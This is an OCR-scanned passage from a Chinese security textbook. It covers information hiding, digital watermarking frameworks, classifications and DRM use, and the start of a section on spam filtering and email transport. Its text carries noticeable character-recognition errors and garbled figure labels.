(5) 安全 性 (Security) : 内 入 算法 具有 较 强 的 抗 攻击 能 力 , 即 它 能 够 承受 一 定 程度 的 
攻击 ,但 隐秘 信息 不 会 被 破坏 。 

(6) 自 恢复 性 (Self-repairability) : 在 嵌入 隐秘 信息 的 载体 遭受 破坏 的 情况 下 ,能够 
从 留 下 的 片段 数据 中 恢复 出 隐秘 信息 , 且 恢 复 过 程 中 不 需要 原始 载体 的 能 力 。 

(7) 对 称 性 (Symmetry) : 嵌入 过 程 和 提取 过 程 具有 对 称 性 ,以 减少 存 取 难 度 。 

在 这 些 特 点 中 ,和 鲁 棒 性 不 可 检测 性 和 骨 入 容量 是 信息 隐藏 技术 最 主要 的 三 个 属性 , 它 
们 之 间 相 互 制约 。 除 此 之 外 ,信息 隐藏 技术 还 有 一 些 其 他 的 特征 ,如 可 纠 错 性 .通用 性 等 。 

5. 信息 隐藏 技术 主要 应 用 

当前 ,信息 隐藏 技术 在 不 同 领域 得 到 广泛 应 用 ,这 里 介绍 一 些 典型 的 应 用 : 

(1) 隐秘 通信 。 信 息 隐 藏 技术 最 早 主 要 用 于 实现 隐秘 信息 的 安全 传输 。 由 于 骨 入 隐 
秘 信息 的 载体 从 表面 上 看 与 普通 的 公开 媒介 信息 没有 差别 ,使 得 攻击 者 难以 觉察 隐秘 信 
息 的 存在 。 只 有 合法 的 接收 者 才 知道 隐秘 信息 的 存在 ,并 且 能 从 伪装 介质 中 恢复 出 隐秘 
信息 。 目 前 ,信息 隐藏 技术 除了 可 用 于 军事 用 途 , 同 时 也 被 应 用 于 个 人 、 商 业 机 密 信息 保 
护 .电子 商务 中 的 数据 传输 、 网 络 金融 交易 中 重要 信息 的 传递 等 。 

(2) 版 权 保 护 。 当 前 ,信息 内 容 产 品 具 有 数字 化 、 易 窃取 、 易 算 改 和 易 复 制 等 特点 使 
得 版 权 问 题 在 当前 开发 的 互联 网 环境 下 尤为 突出 。 通 过 信息 隐藏 技术 分 支 中 的 数字 水 印 
技术 能 有 效 解决 信息 内 容 产品 的 版 权 保 护 问题 。 数 字 水 印 以 不 可 检测 的 方式 嵌入 到 载体 
中 ,在 不 损害 原 信 息 内 容 产品 的 使 用 价值 的 前 提 下 ,同时 达到 了 版 权 保护 的 目的 。 此 外 ， 
通过 指纹 版 权 标识 能 有 效 追 查 盗版 来 源 。 即 信息 内 容 产品 拥有 者 向 授权 使 用 用 户 所 提供 
的 信息 内 容 产品 中 嵌入 不 同 且 唯一 序列 号 的 指纹 信息 ,同时 维护 授权 的 信息 内 容 产品 复 
制 中 指纹 与 使 用 用 户 身份 之 间 的 对 应 关系 数据 库 。 一 旦 出 现 未 经 授权 的 复制 , 则 信息 内 
容 产品 拥有 者 可 通过 所 维护 的 对 应 关系 数据 库 找到 提供 非法 复制 的 来 源 , 即 可 实现 有 效 
追查 盗版 的 目的 。 

(3) 认证 和 自 改 检测 。 通 过 在 信息 内 容 产品 中 嵌入 数字 水 印信 息 , 能 有 效 实现 对 信 
息 内 容 产 品 所 有 权 的 认证 。 此 外 ,通过 使 用 脆弱 性 版 权 标识 能 够 有 效 地 检测 信息 内 容 的 
真实 性 以 及 完整 性 。 目 前 ,已 经 广泛 应 用 于 公安 法院、 商业 、 交 通 等 领域 ,用 来 判断 犯罪 
记录 现场 事故 照片 是 否 被 自 改 、 伪 造 或 特殊 处 理 过 。 

(4) 票据 防伪 。 高 精度 扫描 机 、 打 印 机 、 复 印 机 等 产品 的 出 现 , 使 得 货币 、 支 票 及 其 他 
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票据 的 伪造 变 得 更 加 容易 。 通 过 在 票据 中 嵌入 隐藏 的 水 印信 息 ,为 各 种 票据 提供 不 可 见 
的 认证 标识 ,从 而 大 大 增加 了 伪造 的 难度 ,从 而 可 有 效 保证 票据 的 真实 性 。 

(5) 数据 的 不 可 抵赖 性 。 在 电子 商务 交易 中 ,交易 的 双方 均 不 能 抵赖 自己 所 做 过 的 
行为 ,也 不 能 否认 曾经 接收 对 方 的 信息 。 此 时 ,可 通过 信息 隐藏 技术 给 交易 过 程 中 的 信息 
嵌入 各 自 的 特征 标识 ,并 且 这 种 特征 标识 是 不 可 去 除 的 ,从 而 能 有 效 达到 不 可 抵赖 行为 的 
发 生 。 

(6) 信息 备注 。 在 有 些 情 况 下 ,需要 备注 某 些 信息 的 有 关 情 况 , 如 数据 采集 时 间 、 地 
点 和 采集 人 信息 。 若 直接 将 这 些 私密 信息 标注 在 原始 文件 上 ,将 对 用 户 的 个 人 隐私 造成 
极 大 的 威胁 。 则 此 时 利用 信息 隐藏 能 有 效 解决 该 问题 ,通过 将 要 备注 的 信息 秘密 地 嵌入 
到 媒介 信息 中 ,只 有 通过 特殊 的 提取 算法 或 密 钥 才 能 读 取 , 从 而 有 效 地 解决 了 私密 信息 备 
注 问题 。 
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在 信息 隐藏 技术 中 , 隐 写 术 和 数字 水 印 是 两 个 主要 的 分 支 ,其 中 隐 写 术 主 要 实现 隐秘 
通信 ;数字 水 印 (Digital Watermarking) 技 术 作 为 信息 隐藏 技术 的 重要 分 支 ,主要 用 来 实 
现 版 权 保 护 、 真 伪 鉴 别 、 认 证 和 完整 性 检测 等 。 作 为 数字 版 权 保护 的 主要 技术 ,本 节 主 要 
介绍 数字 水 印 的 概念 特征、 框架 分 类 及 在 数字 版 权 保护 中 的 应 用 。 

1. 数字 水 印 的 基本 概念 

当前 ,数字 水 印 没 有 统一 的 定义 ,一 般 地 ,数字 水 印 技术 是 指 把 标识 版 权 的 数字 信息 
嵌入 到 多 媒体 数据 中 ,如 图 像 、 音 频 、 视 频 等 ,以 达到 数字 产品 真 伪 鉴别 .版 权 的 所 有 者 证 
明 等 功能 。 这 些 信息 可 以 是 用 户 序 列 号 公司 标识 等 版 权 标识 ,并 且 永 久 的 镶嵌 在 数字 多 
媒体 中 ,只 有 通过 专门 的 检测 器 或 阅读 器 才能 提取 水 印信 息 , 从 而 确定 版 权 归 属 问题 。 

总 之 ,数字 水 印 技术 是 信息 隐藏 技术 的 一 个 主要 的 分 支 , 它 的 出 现 主要 为 了 解决 信息 
内 容 在 互联 网 上 的 版 权 保护 问题 。 

2. 数字 水 印 的 特征 

数字 水 印 技术 是 信息 隐藏 技术 的 重要 分 支 ,除了 具备 前 面 所 述 的 信息 隐藏 技术 的 一 
般 特 点 外 ,还 有 其 固有 特点 ,主要 包括 : 

(1) 鲁 棒 性 : 是 数字 水 印 最 重要 的 一 个 特征 。 有 具体 而 言 , 鲁 棒 性 是 指 含 有 数字 水 印 
的 信息 内 容 产品 经 过 几何 变换 .压缩 .加 噪 、 滤 波 等 攻击 后 ,水 印信 息 仍然 可 以 正确 的 检测 
并 提取 出 来 。 

(2) 不 可 感知 性 : 主要 是 针对 不 可 见 水 印 而 言 , 指 从 人 类 视觉 上 和 采用 统计 方法 也 
无 法 检测 或 提取 数字 水 印信 息 。 

(3) 安全 性 : 即使 攻击 者 知道 数字 水 印 算法 的 情况 下 ,也 无 法 实现 未 经 授权 的 数字 
水 印 嵌 入、 检测 /提取 和 未 经 授权 的 数字 水 印 删除 等 操作 。 

(4) 可 证 明 性 : 在 含有 数字 水 印 的 信息 内 容 产品 在 遭受 到 盗版 ,侵权 或 泄露 等 行为 
时 候 , 数 字 水 印 技术 可 以 为 用 户 提供 安全 、 可 靠 且 毫 无 争议 的 版 权证 明 。 

(5) 能 入 容量 : 一 般 而 言 ,对 于 数字 水 印 系 统 而 言 , 其 嵌入 容量 要 求 相 对 较 小 ,而 隐 
写 术 则 通常 要 求 较 大 的 嵌入 容量 。 这 是 因为 对 于 数字 水 印 算法 而 言 ,嵌入 的 信息 量 越 大 ， 
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则 可 能 降低 数字 水 印 的 鲁 棒 性 。 在 实际 中 ,需要 均衡 嵌入 容量 和 和 鲁 棱 性 之 间 的 关系 。 

3. 数字 水 印 系统 框架 

一 般 地 ,数字 水 印 系 统 框 架 可 形式 化 为 一 个 九 元 组 : (M,X,W.K,G,E,,A,D,E,)， 
其 中 M 表示 原始 信息 m 的 集合 ;X 表示 所 有 要 保护 的 信息 内 容 产 品 zx 的 集合 ;W 表示 所 
有 可 能 数字 水 印信 号 w 的 集合 ; K 表示 数字 水 印 密 钥 集 合 ;G,E,,A,D,E, 分 别 表示 数 
字 水 印 的 生成 .嵌入 攻击 检测 和 提取 算法 。 一 个 完整 的 数字 水 印 系统 框架 应 由 五 部 分 
组 成 : 数字 水 印 生成 模型 .数字 水 印 嵌 入 模型 ,数字 水 印 攻击 模型 .数字 水 印 检测 模型 和 
数字 水 印 提取 模型 ,具体 如 图 10-15 所 示 。 


数字 水 印 提 
取 算法 
密 钥 K 
提取 数字 水 印 
| 数字 水 印 w 门 
嵌入 数字 水 印 的 本 受 攻击 后 含 数字 1 
eile | 信息 内 容 产 品 w”| “| 传输 信道 一 | 水印 产品" 
信息 内 容 
产品 * 
有 无 数字 水 印 
数字 水 印 生成 数字 水 印 庶 入 数字 水 印 
算法 G 算法 En 攻击 算法 A 数字 水 印 
检测 算法 
图 10-15 ”数字 水 印 系统 框架 
1) 数字 水 印 生成 算法 


数字 水 印 生成 算法 G 主要 思想 是 在 密 钥 K 的 控制 下 ,由 原始 信息 m 生成 适合 嵌入 
到 信息 内 容 产品 zx 中 的 待 戏 入 数字 水 印 w 的 过 程 ,是 数字 水 印 处 理 的 基础 。G 可 形式 化 
表示 为 : 

G:MXXXK>W, w=G(m,7r,K) 

其 中 原始 信息 m 主要 类 型 有 : 文本 信息 声音 信号 、 二 值 图 像 . 灰 度 图 像 .彩色 图 像 和 无 特 
定 含义 的 序列 。 

数字 水 印 生成 算法 G 应 保证 数字 水 印信 息 的 唯一 性 和 有 效 性 。 为 了 提高 数字 水 印 
系统 的 鲁 棒 性 和 安全 性 ,通常 不 是 直接 嵌入 原 始 信息 ,而 是 通过 某 种 方法 生成 适合 嵌入 的 
数字 水 印 w。 常 见 的 数字 水 印 生成 算法 有 : 伪 随 机 水 印 生 成 . 扩 频 水 印 生 成 混沌 水 印 生 
成 、 纠 错 编码 水 印 生成 .基于 分 解 的 水 印 生成 .基于 变换 的 水 印 生成 、 多 分 辩 率 水 印 生成 和 
自 适应 水 印 生成 方法 。 

2) 数字 水 印 嵌 和 算法 

数字 水 印 嵌 入 算法 E。, 是 指 将 生成 的 数字 水 印 按照 一 定 的 规则 嵌入 到 信息 内 容 产品 
工 中 ,生成 能 和 数字 水 印 的 信息 内 容 产品 ze" ,可 形式 化 表示 为 : 

E.:XXW—X, z= E(x,w) 

其 中 并 表示 信息 内 容 产品 ,z* 表示 嵌入 数字 水 印 的 信息 内 容 产 品 。 为 了 提高 安全 性 ,有 
时 候 在 已 。 中 使 用 嵌入 密 钥 进行 水 印 嵌 入 。 

常见 的 数字 水 印 嵌 入 规则 有 : 加 性 规则 、 乘 法 规则 、 蔡 换 规则 、 量 化 规则 、 基 于 关系 嵌 
入 .基于 统计 特性 嵌入 等 。 例 如 ,加 性 规则 : xz” 一 xz 十 rw; 乘法 规则 : ze 一 zx 十 azru, 其 中 w 
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为 数字 水 印 强度 ,用 以 调节 数字 水 印 不 可 感知 性 和 数字 水 印 鲁 棒 性 。 

3) 数字 水 印 攻击 算法 

与 密码 技术 类 似 , 数 字 水 印 技术 在 实际 应 用 中 也 会 遭受 各 种 各 样 的 攻击 。 主 要 思想 
是 攻击 者 通过 对 含有 数字 水 印 的 信息 内 容 产品 进行 常规 或 恶意 的 处 理 , 使 得 数字 水 印 系 
统 的 检测 工具 无 法 正确 地 恢复 数字 水 印信 号 ,或 者 不 能 检测 到 水 印信 号 的 存在 。 数 字 水 
印 攻击 算法 可 表示 为 : 

A:XXK—>X, 2"=A(zr",K') 

其 中 K' 是 攻击 者 伪造 的 密 钥 ,2* 是 被 攻击 后 含 数字 水 印 的 产品 。 

当前 ,不 同 的 研究 人 员 对 数字 水 印 攻击 进行 了 不 同 的 分 类 ,如 Craver 等 将 攻击 方法 
分 为 : 鲁 棒 性 攻击 (Robustness attack)、 表 达 攻 击 (Presentation attack)、 解 释 攻 击 
(Interpretation attack) 和 合法 攻击 (Legal attack) 。Hartung 等 将 攻击 方法 分 为 简单 攻击 
(Simple attack)、 禁止 提取 攻击 (Detection-disabling attack)、 混 消 攻 击 (Ambiguity 
attack) 和 去 除 攻 击 (Remove attack) 。Voloshynovskiy 等 将 攻击 分 为 去 除 攻 击 (Removal 
attacks) .几何 攻击 (Geometrical attacks) ,密码 攻击 (Cryptographic attacks) 和 协议 攻击 
(Protocol attacks) 。 除 此 之 外 ,还 有 各 种 其 他 类 型 的 划分 ,这 里 就 不 再 介绍 。 

4) 数字 水 印 检测 算法 和 提取 算法 

数字 水 印 检测 D 是 根据 检测 密 钥 通过 一 定 的 算法 判断 出 信息 内 容 产 品 z” 中 是 否 含 
有 数字 水 印信 息 ,数字 水 印 提取 算法 已. 是 在 确定 信息 内 容 产品 f 含有 数字 水 印信 息 的 
情况 下 ,利用 提取 密 钥 ,根据 数字 水 印 嵌入 算法 E, 的 逆 过 程 E, 提取 信息 内 容 产 品 z” 中 
的 数字 水 印信 息 忆 ,也 即 数字 水 印 提取 算法 E, 可 看 作 是 数字 水 印 嵌 入 算法 已。 的 逆 过 程 。 

目前 ,数字 水 印 检测 算法 主要 有 基于 相关 的 数字 水 印 检测 算法 和 基于 统计 决策 理论 
的 数字 水 印 检测 算法 ,其 中 基于 相关 性 数字 水 印 检 测算 法 得 到 了 广泛 了 应 用 ,其 基本 思想 
是 通过 计算 受到 攻击 后 且 嵌 入 数字 水 印 的 信息 内 容 产品 地 与 原始 信息 内 容 产 品 z 之 间 
的 相似 性 ,车 相似 性 超过 了 给 定 的 辣 值 , 则 可 判断 信息 内 容 产 品 2* 中 已 经 嵌入 数字 水 印 
信息 忆 , 反 正 , 则 没有 嵌入 数字 水 印信 息 。 

4. 数字 水 印 的 分 类 

按照 不 同 的 标准 ,数字 水 印 有 不 同 的 分 类 方式 ,主要 有 : 

(1) 按 数 字 水 印 所 附 载 信息 内 容 类 型 分 类 。 根 据 数字 水 印 所 依附 的 载体 不 同 ,可 将 
数字 水 印 划 分 为 文本 数字 水 印 ,图像 数 字 水 印 .音频 数字 水 印 ,视频 数字 水 印 等 。 

(2) 按 数 字 水 印 的 外 观 分 类 。 根 据 数字 水 印 的 外 观 可 见 性 ,可 将 数字 水 印 划分 为 可 
见 数字 水 印 和 不 可 见 数字 水 印 。 可 见 数字 水 印 的 目的 在 于 明确 标识 版 权 , 防 止 非法 使 用 。 
其 不 会 影响 信息 内 容 产品 的 使 用 ,但 降低 了 信息 内 容 产品 的 质量 。 不 可 见 数字 水 印 从 信 
息 内 容 产品 表面 是 察觉 不 到 的 , 当 发 生 版 权 纠 纷 时 ,版 权 所 有 者 可 通过 专门 的 检测 器 从 中 
提取 标识 ,从 而 证 明 信 息 内 容 产品 的 版 权 , 是 目前 应 用 比较 广泛 的 数字 水 印 。 

(3) 按 数字 水 印 的 内 容 分 类 。 根 据 数字 水 印 的 内 容 可 将 数字 水 印 分 为 有 意义 数字 水 
印 和 无 意义 数字 水 印 。 有 意义 数字 水 印 是 指数 字 水印 本 身 也 是 某 个 数字 图 像 , 如 商标 图 
形 或 数字 音频 片断 的 编码 ;无 意义 数字 水 印 则 使 用 一 个 随机 序列 来 表示 ,无 法 从 主观 视觉 
上 判断 去 表达 的 意思 。 
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(4) 按 数字 水 印 的 特性 分 类 。 按 数字 水 印 特性 可 将 数字 水 印 划 分 为 鲁 棒 性 数字 水 印 
和 脆弱 性 数字 水 印 。 重 棒 性 数字 水 印 主 要 用 于 标识 信息 内 容 产 品 的 版 权 归属 ,如 版 权 信 
息 `. 所 有 者 信息 等 ,其 要 求 嵌 入 的 数字 水 印 能 抵抗 多 种 有 意 或 无 意 攻击 ;脆弱 性 数字 水 印 
与 鲁 棒 性 数字 水 印 刚 好 相反 ,其 对 内 容 的 修改 非常 敏感 ,主要 用 于 信息 内 容 完 整 性 保护 。 

(5) 按 数字 水 印 的 检测 /提取 过 程 分 类 。 根 据 数字 水 印 的 检测 /提取 过 程 可 将 数字 水 
印 划分 为 非 育 水 印 , 半 盲 水 印 和 盲 水 印 。 非 盲 水 印 是 指 在 检测 和 提取 时 需要 原始 附 载 信 
息 内 容 和 原始 数字 水 印 的 参与 ; 半 盲 水 印 是 指 在 检测 和 提取 过 程 中 不 需要 原始 附 载 信息 
内 容 , 但 需要 原始 数字 水 印 ; 盲 水 印 是 指数 字 水 印 检测 和 提取 过 程 中 既 不 需要 原始 附 载 信 
息 内 容 参 与 ,也 不 需要 原始 数字 水 印 。 

(6) 按 数字 水 印 隐藏 的 位 置 分 类 。 根 据 数字 水 印 的 隐藏 位 置 , 可 划分 为 时 域 ( 空 域 ) 
数字 水 印 , 频 域 ( 变 换 域 ) 数 字 水 印 。 时 域 ( 空 域 ) 数 字 水 印 是 通过 在 时 /空域 修改 信号 样本 
达到 隐藏 数字 水 印 的 目的 。 主 要 有 最 低 有 效 位 (Least significant bit, LSB) 方 法 、 
Patchwork 方法 、 纹 理 块 映射 编码 方法 等 。 频 域 (变换 域 ) 数 字 水 印 是 指 通过 将 信号 样本 
经 过 某 种 变换 如 离散 小 波 变换 (Discrete wavelet transform, DWT)、 离 散 傅 里 叶 变 换 
(Discrete flourier transform,DFT) 离散 余弦 变换 (Discrete cosine transform,DCT) 或 奇 
异 值 分 解 (Singular value decomposition,SVD) 变 换 后 通过 改变 其 变换 系数 达到 髓 入 数字 
水 印 的 目的 。 

(7) 按 数字 水 印 算法 的 可 道 性 分 类 。 根 据 数字 水 印 检 测 和 提取 后 是 否 可 以 完全 恢复 
原始 信息 ,可 分 为 不 可 逆 数 字 水 印 和 可 道 数字 水 印 。 

(8) 按 数字 水 印 算法 的 用 途 分 类 。 根 据 数字 水 印 的 用 途 , 可 将 数字 水 印 划分 为 版 权 
保护 水 印 、 票 据 防伪 水 印 . 认 证 / 算 改 提示 水 印 和 隐藏 标识 水 印 等 。 

5. 数字 水 印 在 数字 版 权 保 护 中 的 应 用 

数字 水 印 技术 为 数字 版 权 保 护 提供 了 一 种 解决 方案 。 在 开放 的 互联 网 环境 中 ,要 构 
建 一 个 完整 的 信息 内 容 产 品 的 保护 系统 ,除了 制定 数字 水 印 的 嵌入 和 检测 /提取 过 程 的 实 
施 方案 外 ,还 需要 采取 一 套 完整 的 体系 和 协议 ,规定 网 上 利益 各 方 在 信息 内 容 产 品 交易 
时 ,必须 遵守 一 套 认可 的 协议 。 

1) 数字 版 权 保护 概念 

数字 版 权 保护 技术 (Digital Rights Management, DRM) 就 是 对 各 类 数字 内 容 知 识 的 
知识 产权 进行 保护 的 一 系列 软 硬 件 技术 ,用 以 保证 数字 内 容 在 整个 生命 周期 内 的 合法 使 
用 ,平衡 数字 内 容 价 值 链 中 各 个 角色 的 利益 和 需求 ,促进 整个 数字 化 市 场 的 发 展 和 信息 的 
合法 传播 。DRM 贯穿 于 数字 内 容 的 产生 到 分 发 .从 销售 到 使 用 的 整个 内 容 流 通过 程 , 涉 
及 整个 数字 内 容 价 值 链 ,如 图 10-16 所 示 。 


a | wn |) { van [) {xem |) 3 | 用 户 


10-16 ”数字 内 容 价值 链 


对 数字 内 容 的 版 权 保护 ,必须 根据 所 保护 的 数字 内 容 特征 ,按照 相应 的 商业 模式 和 现 
行 的 法 律 体系 进行 。 数 字 版 权 保护 技术 和 商业 模式 法律 基 础 三 者 相辅相成 ,构成 整个 数 
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字 版 权 保 护 体 系 。 这 里 主要 介绍 数字 版 权 保护 技术 。 在 DRM 系统 中 ,数字 水 印 技术 可 
实现 元 数据 保护 ,发现 盗版 后 取证 或 跟踪 、 自 改 提示 与 完整 性 保护 ,许可 证 信息 保护 和 数 
据 注 解 和 访问 控制 等 功能 。 

2) 基于 数字 水 印 的 数字 版 权 保护 系统 

一 个 比较 有 影响 的 安全 数字 水 印 体系 是 欧洲 委员 会 DGII 计划 制定 的 网 络 数字 产品 的 
知识 版 权 保 护 IPR(Intellectual Property Rights) 认 证 和 保护 体系 标准 IMPRMATUR 。 
这 里 仅 考 虑 数字 产品 原创 者 ,销售 商 到 购买 用 户 之 间 的 利益 关系 。 在 此 基础 上 ,介绍 一 种 
简化 的 基于 数字 水 印 的 数字 产品 的 版 权 保护 系统 ,如 图 10-17 所 示 。 


原创 者 A Cs) 
授权 | fe 


版 权 所 有 者 B 一 | 媒体 发 布 商 MD 授权 用 户 AC md 
Key2 
| \ 付费 
a AWI AW2 AW3 
数字 作品 AW Watermarking1 Watermarking2 Watermarking3 
Keyl Keyl+PIN]1 Keyl+PIN2 Key(WR)+PIN3 


图 10-17 基于 数字 水 印 的 数字 版 权 保护 系统 


在 该 系统 中 ,A 为 数字 产品 的 原创 者 ,WR 为 版 权 登记 认证 中 心 ,A 在 完成 数字 产品 
的 生产 后 ,将 授权 给 版 权 所 有 者 B, 然 后 由 版 权 所 有 者 B 向 版 权 认 证 中 心 WR 进行 作品 登 
记 , 并 在 WR 中 B 选择 私 钥 Keyl 向 期 望 保护 的 数字 作品 AW 嵌入 含有 也 标识 PIN1 的 
第 一 个 数字 水 印 Watermarkingl ,再 将 加 过 数字 水 印 的 数字 产品 AW1 传 一 份 备份 给 WR 
的 数据 库 中 ,Keyl 由 B 产生 ,具有 唯一 性 。 

当 B 决定 将 其 数字 产品 授权 给 数字 媒体 发 布 商 MD, 让 MD 销售 其 作品 的 复制 品 时 ， 
B 需要 将 MD 的 标识 PIN2 结合 私 钥 Keyl 对 数字 作品 嵌入 第 二 个 数字 水 印 
Watermarking2 ,用 来 表示 对 MD 的 授权 和 认可 。MD 得 到 加 有 两 个 数字 水 印 的 数字 作 
品 ,并 可 以 用 也 的 公 钥 Key2 验证 B 确实 在 其 数字 产品 的 复制 品 中 加 入 了 MD 的 标识 
Watermarking2。MD 作为 B 的 数字 产品 销售 商 ,可 以 验证 第 二 个 数字 水 印 内 容 和 第 一 
个 数字 水 印 内 容 。 

授权 的 MD 将 数字 产品 出 售 给 授权 用 户 AC ,为 证 明 AC 是 经 过 授权 的 正版 用 户 ， 
MD 用 WR 的 私 钥 Key(WR) 和 AC 的 标识 PIN3 对 数字 作品 嵌入 第 三 个 数字 水 印 
Watermarking3 ,并 将 该 消息 通知 给 WR,WR 发 给 MD 一 个 证 书 , 给 B 增 加 一 份 收益 。 


10.5 信息 内 容 安 全 应 用 


本 节 主 要 以 垃圾 邮件 过 滤 系 统 和 网 络 与 情 监控 系统 为 例 , 从 系统 设计 原理 角度 介绍 
信息 内 容 安全 技术 的 主要 应 用 。 
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1051 垃圾 电子 邮件 过 滤 系 统 


当前 ,电子 邮件 以 其 快捷 、 低 成 本 等 优势 已 经 成 为 人 们 日 常生 活 中 重要 的 通信 手段 之 
一 ,然而 ,近年 来 垃圾 电子 邮件 日 益 泛滥 不 仅 占用 了 网 络 带 宽 ,同时 给 和 人们 的 生活 带 来 诸 
多 困扰 。 从 信息 过 滤 角 度 ,垃圾 邮件 过 滤 可 看 作 是 一 个 这 样 一 个 信息 内 容 过 滤 问 题 : 初 
始 时 ,提供 一 定 的 垃圾 邮件 和 非 垃圾 邮件 给 过 滤 系 统 学 习 , 得 到 过 滤 模 型 ;过 滤 的 信息 源 
是 动态 的 邮件 流 ;用 户 可 以 指定 自己 的 垃圾 邮件 集 和 非 垃 圾 邮件 , 供 系统 反馈 学 习 , 建 立 
新 的 过 滤 模 型 。 从 信息 分 类 角度 ,垃圾 邮件 过 滤 是 一 个 二 值 分 类 问题 ,即将 邮件 分 类 为 垃 
圾 邮件 和 合法 邮件 的 过 程 。 本 节 首 先 介绍 垃圾 邮件 的 概念 及 特征 ,然后 介绍 当前 实现 垃 
圾 邮件 过 滤 常 用 的 关键 技术 。 

1. 垃圾 邮件 的 概念 

当前 ,对 垃圾 邮件 (Spam) 没 有 统一 的 定义 。 在 4 中国 互 联网 协会 反 垃 圾 邮件 规范 》 中 
对 垃圾 邮件 的 界定 是 : 

(1) 收 件 人 事先 没有 提出 要 求 或 者 同意 接收 的 广告 .电子 刊物 、 各 种 形式 的 宣传 品 等 
宣传 性 的 电子 邮件 。 

(2) 收 件 人 无 法 拒绝 的 电子 邮件 。 

(3) 隐藏 收 件 人 身份 .地 址 、 标 题 等 信息 的 电子 邮件 。 

(4) 含有 虚假 的 信息 源 .发 件 人 、 路 由 等 信息 的 电子 邮件 。 

(5) 含有 病毒 .恶意 代码 色情、 反动 等 不 良 信息 或 有 害 信息 的 邮件 。 

可 见 , 垃 圾 邮件 具有 以 下 特点 : 未 经 收 件 人 允许 不 请 自 来 ; 具 有 明显 的 商业 目的 或 政 
治 目 的 ;邮件 发 送 量 大 ;非法 的 邮件 地 址 收集 ;隐藏 发 件 人 身份 地 址 、 标 题 等 信息 ;含有 虚 
假 的 .误导 性 的 或 欺骗 性 的 信息 ;非法 的 传递 途径 等 。 

当前 ,垃圾 邮件 的 处 理 手段 包括 法 律 和 技术 两 个 方面 。 目 前 许多 国家 制定 了 反 垃圾 
邮件 法 ,希望 规范 互联 网 上 发 送 电 子 邮 件 的 行为 。 虽 然 采 用 相应 的 法 律 措施 在 一 定 程度 
上 遏制 了 垃圾 邮件 泛滥 ,但 一 方面 对 于 垃圾 邮件 的 概念 存在 争议 ,对 于 像 宣传 品 . 电 子 期 
刊 等 这 类 邮件 是 不 是 垃圾 邮件 较 难 界定 , 另 一 方面 国际 上 缺乏 一 个 统一 的 反 垃 圾 邮件 法 
律 或 措施 ,从 而 使 得 反 垃 圾 邮件 问题 收效 不 大 。 从 技术 角度 而 言 , 反 垃圾 邮件 技术 可 分 为 
“根源 阻 断 ” 和 “存在 发 现 ” 两 类 ,其 中 “根源 阻 断 " 是 指 通 过 防止 垃圾 邮件 的 产生 来 减少 垃 
圾 邮件 六 存在 发 现 ? 是 指 对 已 经 产生 的 垃圾 邮件 进行 过 滤 。 目 前 后 者 是 主流 ,前 者 还 没有 
得 到 实用 。 当 前 ,利用 技术 来 解决 垃圾 邮件 问题 是 研究 者 关注 的 重点 ,也 是 本 节 讨 论 的 
重点 。 

2. 电子 邮件 系统 原理 

要 设计 出 好 的 垃圾 邮件 过 滤 方 案 , 需 要 对 电子 邮件 系统 有 较 好 的 了 解 。 理 论 上 ,电子 
邮件 系统 主要 由 邮件 用 户 代 理 (Mail user agent, MUA)、 邮 件 传 送 代理 (Mail transmit 
agent,MTA) 和 邮件 递交 代理 (Mail deliver agent, MDA) 组 成 。 

(1) MUA: 主要 用 来 帮助 用 户 编辑 、 生 成 ,发 送 接收、 阅读 和 管理 邮件 ,如 Outlook、 
Foxmail 等 。 在 邮件 系统 中 ,用 户 与 MUA 打交道 ,从 而 将 邮件 系统 的 复杂 性 与 用 户 隔 
离开 。 
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(2) MTA: 主要 用 来 处 理 所 有 接收 和 发 送 的 邮件 。 对 于 每 一 个 外 发 的 邮件 ,MTA 
决定 接收 方 的 目的 地 。 若 目的 地 是 本 机 , 则 MTA 直接 将 邮件 发 送 到 本 地 邮箱 或 交 给 本 
地 的 MDA 进行 投递 ; 若 目的 地 是 远程 邮件 服务 器 , 则 MTA 必须 使 用 SMTP 协议 在 
Internet 上 同 远程 主机 通信 。 常 用 的 UNIX MTA 有 Sendmail .Qmail 和 Postfix 等 。 

(3) MDA: MTA 自己 并 不 完成 最 终 的 邮件 发 送 ,一 般 通过 调用 其 他 的 程序 来 完成 
最 后 的 投递 服务 。 这 个 负责 邮件 递交 的 程序 即 是 MDA ,常见 的 UNIX MDA 有 Procmail 
和 Binmail 等 。 

一 般 地 ,具体 的 电子 邮件 系统 传输 过 程 如 图 10-18 所 示 。 


SMTP SMTP SMTP POP3 或 IMAP 


加 一 国人 3 国 和 - 力 


i 用 户 代理 MUA 
用 户 代理 MUA 发 送 端的 MTA 接收 端的 MTA (Ex.Outlook Express) 
(Ex.Outlook Express) 


图 10-18 电子 邮件 系统 传输 过 程 


简单 而 言 ,首先 , 邮件 发 送 者 利用 本 地 的 MUA, 按 照 SMTP 将 邮件 发 送 给 本 地 
MTA。 然 后 ,MTA 根据 邮件 中 的 接收 地 址 中 的 域名 去 查询 域名 服务 器 DNS 获得 接收 
端 MTA 的 IP 地 址 ;发 送 端 的 MTA 按照 SMTP 协议 ,将 邮件 发 送 给 接收 端的 MTA。 根 
据 SMTP 协议 的 规定 : 若 发 送 端的 MTA 无 法 直接 连接 到 接收 端的 MTA , Pe 
MTA 进行 转发 。 发 送 端的 MTA 或 中 继 MTA 在 发 送 邮件 时 , 若 发 送 不 成 功 , 则 会 
多 次 ,直到 发 送 成 功 或 因 尝试 次 数 过 多 而 放弃 为 止 。 这 种 转发 方法 对 转发 邮件 来 源 没有 
限制 ,任何 服务 器 都 可 以 通过 它 来 转发 邮件 , 即 是 开放 式 转发 (Open Relay) 。 由 于 在 邮件 
nh 而 没有 IP 地 址 , 则 经 过 转发 之 后 无 法 得 知 邮件 初始 发 出 的 IP 地 

。 很 多 垃圾 邮件 制造 者 就 是 利用 这 一 点 结合 伪造 域名 信息 来 隐藏 自己 的 实际 发 送 地 
a 最 后 ,接收 端的 MTA 通过 调用 MDA 将 邮件 分 发 到 对 应 的 邮箱 中 。 对 于 用 户 而 言 ， 
通过 MUA ,按照 POP3 或 IMAP 协议 从 邮箱 中 收取 邮件 。 

从 整个 邮件 传输 过 程 来 看 ,可 以 在 其 中 的 一 个 或 多 个 环节 中 设置 过 滤器 来 过 滤 垃 专 
邮件 。 按 照 过 滤器 在 邮件 过 滤 系 统 中 实施 的 主体 ,可 以 将 过 滤器 分 为 : 

(1) MTA 过 滤 : 指 MTA 在 会 话 过 程 中 对 会 话 的 数据 进行 检查 ,对 符合 过 滤 条 件 的 
邮件 进行 过 滤 处 理 。 一 般 地 ,MTA 过 滤 可 以 在 邮件 会 话 过 程 中 的 两 个 阶段 实行 : @ 在 邮 
